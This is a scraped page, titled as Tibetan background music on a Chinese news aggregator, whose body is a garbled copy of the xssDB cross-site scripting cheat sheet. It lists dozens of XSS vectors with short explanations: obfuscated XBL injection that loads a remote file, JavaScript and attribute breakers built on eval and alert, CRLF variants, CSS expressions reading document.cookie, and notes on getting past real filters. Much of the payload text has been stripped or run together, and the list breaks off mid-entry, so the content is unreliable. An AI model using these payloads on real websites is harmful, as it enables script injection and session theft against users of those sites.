藏族背景音乐纯音乐:xssDB
来源:百度文库 编辑:九乡新闻网 时间:2024/04/29 07:04:49
xssdb
this vector utilizes backslashes to exploit a parsing error in gecko based browsers and injects a remote xbl. general, injection, gecko, style injection, xbl, obfuscated thespanner.co.uk backslash-obfuscated xbl injection - variant 2
#98\i\nd\in\g:&
#92url(//busi&
#110ess\i\nfo.&
#99o.uk\/labs
\/xbl\/xbl\
.xml\#xss)&> this vector utilizes backslashes to exploit a parsing error in gecko based browsers and injects a remote xbl. all important characters are obfuscated by unclosed entities. general, injection, gecko, style injection, xbl, obfuscated thespanner.co.uk backslash-obfuscated xbl injection - variant 3
#92url(//busi&
#110ess\i\nfo.&
#99o.uk\/labs
\/xbl\/xbl\
.xml\#xss)&> this vector utilizes backslashes to exploit a parsing error in gecko based browsers and injects a remote xbl. all important characters are obfuscated by unclosed entities. general, injection, gecko, style injection, xbl, obfuscated thespanner.co.uk backslash-obfuscated xbl injection - variant 3
this vector utilizes backslashes to exploit a parsing error in gecko based browsers and injects a remote xbl. as we can see gecko based browsers accept various characters as valid tags. general, injection, gecko, style injection, xbl, obfuscated thespanner.co.uk backslash-obfuscated xbl injection - variant 4this vector utilizes backslashes to exploit a parsing error in gecko based browsers and injects a remote xbl. furthermore unclosed nbsp entities are used to obfuscate the string. general, injection, gecko, style injection, xbl, obfuscated thespanner.co.uk backslash-obfuscated xbl injection - variant 5this vector utilizes backslashes to exploit a parsing error in gecko based browsers and injects a remote xbl. between any character of the original payload null bytes are used to obfuscate. general, injection, gecko, style injection, xbl, obfuscated thespanner.co.uk base works in ie and netscape 8.1 in safe mode. you need the // to comment out the next characters so you won't get a javascript error and your xss tag will render. also, this relies on the fact that the website uses dynamically placed images like ”images/image.jpg” rather than full paths. if the path includes a leading forward slash like ”/images/image.jpg” you can remove one slash from this vector (as long as there are two to begin the comment this will work general, evil tags ha.ckers.org basic back ticked attribute breaker `> this vector breaks back ticked attributes. general, html breaking, basic kishor basic double quoted attribute breaker > this vector breaks double quoted attributes and produces an alert. general, html breaking kishor basic js breaker xyz onerror=alert(6); this vector just fits between script tags and fires an alerts. general, js breaking, basic kishor basic js breaker variant 1 1;a=eval;b=alert;a(b(/c/.source)); this vector breaks js integer assignments. general, js breaking, basic, obfuscated kishor basic js breaker variant 2 1];a=eval;b=alert;a(b(17));// this vector breaks js integer assignments in arrays. general, js breaking, basic, obfuscated kishor basic js breaker variant 3 ];a=eval;b=alert;a(b(16));// this vector breaks js when placed in double quoted arrays. general, js breaking kishor basic js breaker variant 4 '];a=eval;b=alert;a(b(15));// this vector breaks js when embedded in single quoted arrays. general, js breaking, basic, obfuscated kishor basic js breaker variant 5 1};a=eval;b=alert;a(b(14));// js literal object breaker for integer properties. general, js breaking, basic, obfuscated kishor basic js breaker variant 6 '};a=eval;b=alert;a(b(13));// js breaker for literal objects with single quoted string properties. general, js breaking, basic, obfuscated kishor basic js breaker variant 7 };a=eval;b=alert;a(b(12));// js breaker for literal objects with double quoted string properties. general, js breaking kishor basic js breaker variant 8 a=1;a=eval;b=alert;a(b(11));// can be used when js can be injected directly. general, js breaking, basic, obfuscated kishor basic js breaker variant 9 ;//%0da=eval;b=alert;a(b(10));// breaks double quoted strings, injects a comment, carriage return and finally an alert. general, js breaking, crlf kishor basic js breaker variant 10 ';//%0da=eval;b=alert;a(b(9));// breaks single quoted strings, injects a comment, carriage return and finally an alert. general, js breaking, basic, obfuscated, crlf kishor basic single quoted attribute breaker '> this vector breaks single quoted attributes and appends an alert. general, html breaking, basic kishor basic title breaker this basic vector breaks html titles and injects javascript. general, html breaking, basic, title breaking kishor bgsound bgsound general, evil tags ha.ckers.org body background-image body image general, evil tags ha.ckers.org body onload body tag (i like this method because it doesn't require using any variants of ”javascript:” or ”
for some reason, firefox picks up the script closing tag in the quoted string and then proceeds to process the remaining script tags as code. general, gecko, obfuscated, evil tags t3rmin4t0r commented-out block downlevel-hidden block (only works in ie5.0 and later and netscape 8.1 in ie rendering engine mode). some websites consider anything inside a comment block to be safe and therefore it does not need to be removed, which allows our xss vector. or the system could add comment tags around something to attempt to render it harmless. as we can see, that probably wouldn't do the job. general, obfuscated, conditional comments, internet explorer ha.ckers.org comment-breaker using obfuscated javascript */a=eval;b=alert;a(b(/e/.source));/* this vector creates an alert by breaking multiline comments. general, comment breaking, js breaking kishor conditional style injection for ie width: ((window.r==document.cookie)?'':alert(r=document.cookie)) this vector uses javascript conditional statements to inject an alert into css properties - it was once used as a poc for a vulnerability in stefan di paolos data binding example. general, obfuscated, internet explorer, style injection doctordan content replace xss content replace as an attack vector (assuming ”http://www.google.com/” is programmatically replaced with null). i actually used a similar attack vector against a several separate real world xss filters by using the conversion filter itself (like http://quickwired.com/kallahar/smallprojects/php_xss_filter_function.php) to help create the attack vector (”java script:” was converted into ”java script:”. general, evil tags, obfuscated ha.ckers.org cookie manipulation cookie manipulation - admittedly this is pretty obscure but i have seen a few examples where div background-image general, evil tags, style injection ha.ckers.org div background-image 2div background-image plus extra characters. i built a quick xss fuzzer to detect any erroneous characters that are allowed after the open parenthesis but before the javascript directive in ie and netscape 8.1 in secure site mode. these are in decimal but you can include hex and add padding of course. (any of the following chars can be used: 1-32, 34, 39, 160, 8192-8203, 12288, 65279) general, evil tags, style injection ha.ckers.org divdiv - a variant of this was effective against a real world cross site scripting filter using a newline between the colon and ”” general, evil tags, style injection, internet explorer ha.ckers.org div w/unicodediv background-image with unicoded xss exploit (this has been modified slightly to obfuscate the url parameter). the original vulnerability was found by renaud lifchitz (http://www.sysdream.com) as a vulnerability in hotmail. general, evil tags, obfuscated ha.ckers.org double open angle brackets